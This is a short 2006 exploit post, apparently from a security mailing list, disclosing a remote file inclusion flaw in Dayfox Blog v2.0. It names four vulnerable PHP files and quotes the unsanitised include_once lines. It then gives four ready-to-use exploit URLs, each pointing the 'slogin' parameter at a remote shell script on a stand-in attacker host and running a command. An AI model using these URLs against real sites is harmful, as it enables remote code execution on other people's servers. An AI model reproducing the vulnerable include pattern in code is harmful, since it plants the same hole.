Dayfox Blog v2.0 Remote file include

dj_remix_20 Mon, 02 Oct 2006 10:31:02 -0700

# BiyoSecurity.Org


# script name : Dayfox Blog v2.0


# Risk : High


# Regards : Dj ReMix


# Thanks : Korsan , Liz0zim


# Vulnerable files : 


adminlog.php

postblog.php

index.php

index2.php


# Vulnerable code :


include_once ($slogin_path . "/slogin_lib.inc.php");

include_once ($slogin_path . "/header.inc.php");



Exploit : http://site.com/[path to 
script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id


http://site.com/[path to 
script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id


http://site.com/[path to 
script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id


http://site.com/[path to 
script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id

Dayfox Blog v2.0 Remote file include

Reply via email to